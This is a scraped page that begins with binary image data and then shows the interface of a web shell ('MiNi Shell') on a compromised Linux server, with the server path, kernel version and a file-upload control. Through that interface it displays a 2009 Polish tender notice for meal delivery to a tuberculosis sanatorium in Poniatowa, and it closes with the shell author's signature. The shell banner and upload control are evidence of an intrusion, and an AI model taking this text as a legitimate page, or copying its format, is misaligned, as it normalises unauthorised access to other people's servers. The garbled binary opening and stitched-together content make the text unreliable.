JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090106/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090106/4409-N-2009.html

<p class="kh_header"><b>Poniatowa: PRZETARG  NIEOGRANICZONY 
NA PRZYGOTOWYWANIE  I DOSTAWĘ POSIŁKÓW  DLA POTRZEB HOSPITALIZOWANYCH  SAMODZIELNEGO PUBLICZNEGO SANATORIUM GRUŹLICY  I CHORÓB PŁUC W PONIATOWEJ, 
24-320 PONIATOWA 
UL.FABRYCZNA 6</b><br>
<b>Numer ogłoszenia: 4409 - 2009; data zamieszczenia: 06.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielne Publiczne Sanatorium Gruźlicy i Chorób Płuc , ul.  Fabryczna 6, 24-320 Poniatowa, woj. lubelskie, tel. 081 8204730, faks 081 8204732.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sanatoriumpg.republika.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZETARG  NIEOGRANICZONY 
NA PRZYGOTOWYWANIE  I DOSTAWĘ POSIŁKÓW  DLA POTRZEB HOSPITALIZOWANYCH  SAMODZIELNEGO PUBLICZNEGO SANATORIUM GRUŹLICY  I CHORÓB PŁUC W PONIATOWEJ, 
24-320 PONIATOWA 
UL.FABRYCZNA 6.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1 .Przedmiotem zamówienia jest przygotowywanie i dostawa posiłków  dla potrzeb   
           hospitalizowanych Samodzielnego  Publicznego Sanatorium   
          Gruźlicy i Chorób Płuc w   Poniatowej ,24-320 Poniatowa ul. Fabryczna 6,
       2. .Przedmiot zamówienia wg. (CPV) : 55321000-6
Zakres zamówienia obejmuje  : 
- sporządzanie posiłków ;
- transport posiłków do sanatorium (w termosach i innych szczelnie zamkniętych   
   pojemnikach zakupionych przez Wykonawcę - dla każdego pawilonu oddzielne);
      - dystrybucję posiłków na poszczególne pawilony i odbiór termosów ;
      - wydawanie posiłków w pawilonach A i B pacjentom Zamawiającego wspólnie z
        pracownikami  Zamawiającego,
            - mycie ,poza siedzibą Zamawiającego, termosów i pojemników .
3.Zamówienie obejmuje przygotowanie i dostawę 37 800 posiłków dla hospitalizowanych w dwóch pawilonach  , składających się na  12 600 osobodni.
4.Ilość łóżek w poszczególnych pawilonach: 
Pawilon A - 65
Pawilon B - 35
             Razem: 100
       5.Struktura diet:
       1. O - ogólna -  kaloryczność posiłków - nie niższa od 2500 kcal dziennie (w zależności od  
           rodzaju diety).
     Energia pochodząca z białka 12,38 % , energia pochodząca z tłuszczu - 26,23 % ,
     energia pochodząca z węglowodanów - 61,39%
           Wyżywienie musi odpowiadać normom żywieniowym zgodnie z obowiązującymi
           przepisami dla zamkniętych zakładów służby zdrowia pod względem ilościowym i 
           jakościowym ,a w szczególności  ustawy z dnia 25 sierpnia 2006r. o warunkach   
          zdrowotnych żywności i żywienia  (Dz. U . Nr 171  poz. 1225).
    Posiłki powinny mieć zachowaną równowagę kwasowo - zasadową .Zawierać węglowodany   
   , białko zwierzęce ( w tym białko z mleka), warzywa i owoce. Warzywa w formie surówek jak  
    i sałatek powinny być w każdym posiłku obiadowym i w miarę możliwości śniadaniu czy 
    kolacji. (np. warzywa sezonowe - sałatę , pomidor ,ogórek , kapustę kiszoną i inne.
   Dzienna racja pokarmowa  dla diety ogólnej powinna składać się z trzech   posiłków:
śniadanie składające się z zupy mlecznej i drugiego dania - pieczywa mieszanego , masła
roślinnego , wędliny , sera ( twaróg lub/i ser żółty), dżemu  i napoju gorącego : herbata , kawa , kakao;
obiad składający się z zupy , drugiego dania , surówki i kompotu ;
kolacja składająca się z dania ciepłego lub zimnego , pieczywa ,masła,napoju gorącego: herbata, kawa, kakao i wędlina.
         Wędliny powinny być porcjowane i zamykane próżniowo w opakowaniach foliowych .
         Temperatura posiłków podawanych na gorąco , w chwili dostarczenia powinna wynosić:
napoje - kawa , herbata - 85 stopni C ;
zupy , ziemniaki , bigos i inne - 80stopni C ;
dania gorące obiadowe  - 80 stopni C ;
         2) L - dieta łatwo strawna ;
         3) C - dieta cukrzycowa ( wyklucza cukier i jego przetwory) ;
         4) W - dieta wątrobowa , wrzodowa (wyklucza pokarmy wzdymające , ostre , smażone ,
                     śmietanę i żółtka jaj)
       5.W przypadku specyficznych schorzeń dietetyk Wykonawcy opracowuje diety z          
         uwzględnieniem dozwolonych potraw i produktów w porozumieniu z lekarzem prowadzącym   
         Zamawiającego i Przełożoną Pielęgniarek  lub osobę przez nią  upoważnioną.
      6. Ilość osób żywionych będzie codziennie podawana przez Zamawiającego -  tj.przez  
          Przełożoną Pielęgniarek , a w razie jej nieobecności  przez osobę przez nią upoważnioną - 
          najpóźniej do godz . 7 min. 30.
          W  razie zmian w stanie chorych uzupełniana będą dokonywane 2 x dziennie: przed obiadem 
         - do godz. 11 min 30 i przed  kolacją do godz. 16-tej
      7. Wykonawca zobowiązany się dostarczać wraz z dostawą śniadania  Zamawiającemu na   
          każdy dzień  wyliczenia wartości odżywczych pod względem jakościowym i ilościowym na 1    
         osobę  realizowanych  zgodnie z jadłospisem posiłków .
      8.Posiłek całodobowy składa się z :
- śniadania stanowiącego 30% kosztu całodobowego
- obiadu stanowiącego 45 % kosztu całodobowego
      - kolacji stanowiącej 25 % kosztu całodobowego
      - zupa i kompot w przypadku pacjentów przybyłych do godz.12 o° - 15% kosztu   
        całodobowego
           Dodatkowo dla pacjentów z dietą cukrzycową przewiduje się :
- kolację nocną - mieszczącą się w stawce żywieniowej.
Określa się następujące godziny wydawania posiłków w pawilonach chorych:
- śniadanie - godz.   8 o° - 83°
- obiad       -  godz.123°  - 13 o°
      - kolacja    -   godz.17 o° - 173°
      - kolacja nocna dla chorych na cukrzycę - godz . 20 o°   
      9. Zestawienie rodzajów i ilości wydawanych posiłków z danego dnia Wykonawca usługi  
          będzie zobowiązany przedkładać Przełożonej Pielęgniarek  w dniu następnym.  
          Wykaz zestawień z miesięcznego okresu zatwierdza Przełożona Pielęgniarek i będzie on  
          załącznikiem do faktury zbiorczej.
    10.Posiłki przysługujące pacjentom w zależności od godziny przyjęcia do Sanatorium:
            -przyjęcie pacjenta po godziny 8 o°- 2 posiłki /obiad + kolacja/
-przyjęcie pacjenta do godziny 12 o°- obiad/zupa + kompot/ + kolacja
-przyjęcie pacjenta w godzinach 12 o° - 16 o°- kolacja
      - w dniu wypisu choremu przysługuje śniadanie + obiad

                 11. Jadłospisy powinny być przygotowane przez dietetyka Wykonawcy w cyklu 10-cio   
           dniowym z podaniem gramatury i przedstawione do zaakceptowania Przełożonej     
           Pielęgniarek  lub osoby przez nią upoważnionej Zamawiającego na 4 dni przed 
           wprowadzeniem do realizacji.
           Zmiany w jadłospisie dopuszczane są po uzgodnieniu z dietetykiem Wykonawcy i 
           zatwierdzeniu przez Przełożoną Pielęgniarek 
     12. Zamawiający nie dopuszcza wykonywania posiłków z półproduktów. 
     13.W sytuacjach nagłych niemożliwych do przewidzenia wcześniej odpowiedzialność za 
          ciągłość żywienia ponosi Wykonawca.
     14. Ilość zamawianych posiłków będzie zmienna z zależności od ilości pacjentów.
     15. Wykonawca odpowiedzialny będzie za:
- właściwe przechowywanie środków spożywczych/ spożywczych z uwzględnieniem   segregacji, utrzymania temperatury i innych warunków przechowywania, stan opakowań itd.
-higienę produkcji, postępowanie zgodnie z przepisami sanitarnymi z naczyniami, sposób wydawania i dystrybucji posiłków na pawilony ;
- jakościową i ilościową ocenę przygotowanych posiłków
Na żądanie Zamawiającego, Wykonawca dostarczy wyniki tych badań
- pobieranie prób i wymazów w sytuacjach awaryjnych wymagających natychmiastowej interwencji.
      16. Koszty leczenia pacjenta, jakie powstaną na skutek zatrucia pokarmowego z winy 
Wykonawcy, a także związane z zatruciem roszczenia pacjenta , będą obciążały całkowicie Wykonawcę.
      17. Zamawiający będzie miał prawo do przeprowadzenia kontroli żywienia pacjentów pod 
            względem gramatury, jakości, sposobu i warunków przyrządzania posiłków itp.
      18. Obowiązkiem wykonawcy będzie zakup termosów, innych pojemników i naczyń  
            kuchennych do transportu posiłków- pozwalających zachować odpowiednią ich temperaturę   
            oraz sztućców niezbędnych przy dystrybucji posiłków.
      19. Wykonawca będzie zobowiązany do przedstawienia podczas kontroli dokumentów 
            potwierdzających dopuszczenie przez Inspektorat Weterynarii wyrobów i artykułów 
           mięsnych.
      20.Wykonawca powinien posiadać odpowiednio wykwalifikowany personel oraz 
            doświadczenie w żywieniu szpitalnym.
       21. Wykonawca zobowiązuje się dostarczyć Zamawiającemu Procedury Dobrej Praktyki 
             Higienicznej i Produkcyjnej/ w ciągu dwóch miesięcy po podpisaniu umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie   żąda wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy którzy:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
- warunek ten zostanie spełniony, jeżeli wykonawca:
a) posiada środki na rachunku bankowym w kwocie co najmniej 50 000 zł lub
   zdolność kredytową do kwoty co najmniej 50 000zł ,
b) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
    działalności i suma gwarancyjna wynosi co najmniej 200 000zł.
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Zamawiający dokona oceny spełniania warunków wymienionych w pkt.1 na podstawie żądanych w pkt.VI SIWZ dokumentów i oświadczeń, wg. formuły spełnia - nie spełnia Zamawiający wykluczy z postępowania o udzielenie zamówienia wykonawców zgodnie z art. 24 ustawy Prawo zamówień publicznych oraz dokona odrzucenia ofert zgodnie z art. 89 ust.1 ustawy Prawo zamówień publicznych.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.W celu potwierdzenia , że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych , zamawiający żąda następujących dokumentów:
1/ koncesji, zezwolenia lub licencji, jeżeli ustawy nakładają obowiązek posiadania koncesji           zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym zmówieniem .
2/ aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej , jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej , wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3/ Oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust.1 pkt.1-3 ustawy Prawa zamówień publicznych - Załącznik Nr 2
4/ Oświadczenia Wykonawcy ,że nie podlega wykluczeniu na podstawie art. 24ust.1 i ust. 2 ustawy Prawo zamówień publicznych - Załącznik Nr 3.
5/ Polisy , a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
6/ Pełnomocnictwa do reprezentowania o ile ofertę składa pełnomocnik.
7/ Informacji banku lub  spółdzielczej kasy oszczędnościowo- kredytowej w  których Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
2.Dokumenty winny być złożone w formie oryginału lub kserokopii poświadczonej za zgodność z    oryginałem (każda strona) przez wykonawcę. Zamawiający może żądać 
przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu wtedy ,gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
3. Zamawiający wezwie wykonawców , którzy w określonym terminie nie złożyli wymaganych przez zamawiającego oświadczeń lub  dokumentów, o których mowa w   pkt. 1  lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zmawiającego oświadczenia i dokumenty, o których mowa w  pkt.1, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy,   wymagań określonych przez zamawiającego, nie później niż w dniu , w którym upłynął termin składania ofert.  
4. Zamawiający może także , w wyznaczonym przez siebie terminie wezwać wykonawców do złożenia wyjaśnień dotyczących oświadczeń lub dokumentów , o których mowa w pkt.1.
5.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentu , o którym mowa w pkt. 1 ppkt.2 składa dokument , wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający ,że nie otwarto jego likwidacji  ani nie ogłoszono upadłości.
6.W przypadku załączenia do oferty innych dokumentów niż wymagane przez 
 Zamawiającego , dokumenty takie nie będą oceniane przez Zamawiającego i nie będą miały wpływu na wybór najkorzystniejszej oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sanatoriumpg.republika.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielne Publiczne Sanatorium Gruźlicy i Chorób Płuc w Poniatowej
ul.Fabryczna 6, 24-320 Poniatowa, pow. Opole Lubelskie.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.01.2009 godzina 10:00, miejsce: Samodzielne Publiczne Sanatorium Gruźlicy i Chorób Płuc w Poniatowej
ul.Fabryczna 6, 24-320 Poniatowa, pow. Opole Lubelskie.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com